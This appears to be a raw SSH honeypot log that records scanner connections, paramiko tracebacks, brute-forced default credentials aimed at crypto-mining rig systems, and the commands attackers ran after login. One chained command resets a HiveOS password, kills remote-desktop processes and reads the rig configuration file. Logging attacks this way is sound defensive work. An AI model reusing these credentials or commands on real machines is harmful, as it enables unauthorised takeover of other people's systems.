2021-11-23 19:25:36,020 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 19:25:36,020 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 19:25:36,020 - paramiko.transport - ERROR - 
2021-11-23 20:01:58,951 - root - INFO - New connection from: 167.71.2.26
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - EOFError
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - 
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - 
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 20:01:58,973 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 20:01:58,973 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 20:01:58,974 - paramiko.transport - ERROR - 
2021-11-23 20:03:10,904 - root - INFO - New connection from: 167.71.2.26
2021-11-23 20:03:10,905 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 20:03:10,997 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 20:03:11,014 - root - INFO - New client credentials from 167.71.2.26: username: mos, password: mos
2021-11-23 20:03:11,014 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:03:11,050 - root - INFO - New command from 167.71.2.26: b'uname -s -v -n -r -m'
2021-11-23 20:04:16,234 - root - INFO - New connection from: 167.71.2.26
2021-11-23 20:04:16,235 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 20:04:16,330 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 20:04:16,348 - root - INFO - New client credentials from 167.71.2.26: username: mos, password: 123456
2021-11-23 20:04:16,348 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:04:16,385 - root - INFO - New command from 167.71.2.26: b'uname -s -v -n -r -m'
2021-11-23 20:05:21,434 - root - INFO - New connection from: 167.71.2.26
2021-11-23 20:05:21,435 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 20:05:21,528 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 20:05:21,546 - root - INFO - New client credentials from 167.71.2.26: username: mos, password: 1234
2021-11-23 20:05:21,546 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:05:21,582 - root - INFO - New command from 167.71.2.26: b'uname -s -v -n -r -m'
2021-11-23 20:08:35,345 - root - INFO - New connection from: 179.43.187.37
2021-11-23 20:08:35,386 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 20:08:35,386 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - EOFError
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - 
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - 
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 20:08:35,387 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 20:08:35,387 - paramiko.transport - ERROR - 
2021-11-23 20:10:11,129 - root - INFO - New connection from: 179.43.187.37
2021-11-23 20:10:11,137 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 20:10:11,355 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 20:10:11,390 - root - INFO - New client credentials from 179.43.187.37: username: miner, password: mmpOS
2021-11-23 20:10:11,390 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:10:11,468 - root - INFO - New command from 179.43.187.37: b'uname -s -v -n -r -m'
2021-11-23 20:11:46,150 - root - INFO - New connection from: 179.43.187.37
2021-11-23 20:11:46,151 - paramiko.transport - INFO - Connected (version 2.0, client Go)
2021-11-23 20:11:46,341 - paramiko.transport - INFO - Auth rejected (none).
2021-11-23 20:11:46,376 - root - INFO - New client credentials from 179.43.187.37: username: minerstat, password: msos
2021-11-23 20:11:46,377 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:11:46,447 - root - INFO - New command from 179.43.187.37: b'uname -s -v -n -r -m'
2021-11-23 20:27:27,695 - root - INFO - New connection from: 195.133.18.210
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - EOFError
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - 
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - 
2021-11-23 20:27:27,716 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:27:27,716 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 20:27:27,717 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 20:27:27,717 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 20:27:27,717 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 20:27:27,717 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 20:27:27,717 - paramiko.transport - ERROR - 
2021-11-23 20:27:55,437 - root - INFO - New connection from: 195.133.18.210
2021-11-23 20:27:55,875 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 20:27:56,857 - root - INFO - New client credentials from 195.133.18.210: username: user, password: dg801b23dg12dwqsdghaiodg120dgasodg1wo08_123Z
2021-11-23 20:27:56,857 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:27:57,123 - root - INFO - New command from 195.133.18.210: b'sudo hive-passwd c3Rvcnl0aW1lIGRheW9uZSBhbmQgZGF5dHdevbase64; sudo pkill Xorg; sudo pkill x11vnc; cat /hive-config/rig.conf'
2021-11-23 20:28:31,961 - root - INFO - New connection from: 195.133.18.210
2021-11-23 20:28:31,992 - paramiko.transport - INFO - Connected (version 2.0, client libssh2_1.4.3)
2021-11-23 20:28:32,117 - root - INFO - New client credentials from 195.133.18.210: username: user, password: 1
2021-11-23 20:28:32,117 - paramiko.transport - INFO - Auth granted (password).
2021-11-23 20:28:32,155 - root - INFO - New command from 195.133.18.210: b'sudo hive-passwd c3Rvcnl0aW1lIGRheW9uZSBhbmQgZGF5dHdevbase64; sudo pkill Xorg; sudo pkill x11vnc; cat /hive-config/rig.conf'
2021-11-23 20:48:01,463 - root - INFO - New connection from: 192.241.215.51
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 609, in _read_timeout
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -     raise EOFError()
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - EOFError
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - 
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - 
2021-11-23 20:48:11,314 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 20:48:11,314 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 20:48:11,315 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 20:48:11,315 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 20:48:11,315 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner
2021-11-23 20:48:11,315 - paramiko.transport - ERROR - 
2021-11-23 21:07:03,922 - root - INFO - New connection from: 79.132.28.247
2021-11-23 21:07:03,998 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 21:07:03,999 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 21:07:03,999 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 21:07:03,999 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 21:07:03,999 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 380, in readline
2021-11-23 21:07:03,999 - paramiko.transport - ERROR -     buf += self._read_timeout(timeout)
2021-11-23 21:07:03,999 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 607, in _read_timeout
2021-11-23 21:07:04,000 - paramiko.transport - ERROR -     x = self.__socket.recv(128)
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - ConnectionResetError: [Errno 104] Connection reset by peer
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - 
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - 
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 21:07:04,000 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 21:07:04,000 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 21:07:04,000 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 21:07:04,000 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner[Errno 104] Connection reset by peer
2021-11-23 21:07:04,000 - paramiko.transport - ERROR - 
2021-11-23 21:35:31,301 - root - INFO - New connection from: 209.17.96.74
2021-11-23 21:35:34,165 - paramiko.transport - INFO - Connected (version 2.0, client ZGrab)
2021-11-23 21:35:38,845 - paramiko.transport - ERROR - Socket exception: Connection reset by peer (104)
2021-11-23 22:48:37,662 - root - INFO - New connection from: 23.95.222.129
2021-11-23 22:48:37,696 - paramiko.transport - ERROR - Exception: Error reading SSH protocol banner'utf-8' codec can't decode byte 0xfa in position 4: invalid start byte
2021-11-23 22:48:37,701 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 22:48:37,701 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2211, in _check_banner
2021-11-23 22:48:37,701 - paramiko.transport - ERROR -     buf = self.packetizer.readline(timeout)
2021-11-23 22:48:37,701 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/packet.py", line 386, in readline
2021-11-23 22:48:37,701 - paramiko.transport - ERROR -     return u(buf)
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/py3compat.py", line 147, in u
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -     return s.decode(encoding)
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfa in position 4: invalid start byte
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - 
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - During handling of the above exception, another exception occurred:
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - 
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - Traceback (most recent call last):
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2039, in run
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -     self._check_banner()
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -   File "/usr/local/lib/python3.10/site-packages/paramiko/transport.py", line 2215, in _check_banner
2021-11-23 22:48:37,702 - paramiko.transport - ERROR -     raise SSHException(
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - paramiko.ssh_exception.SSHException: Error reading SSH protocol banner'utf-8' codec can't decode byte 0xfa in position 4: invalid start byte
2021-11-23 22:48:37,702 - paramiko.transport - ERROR - 
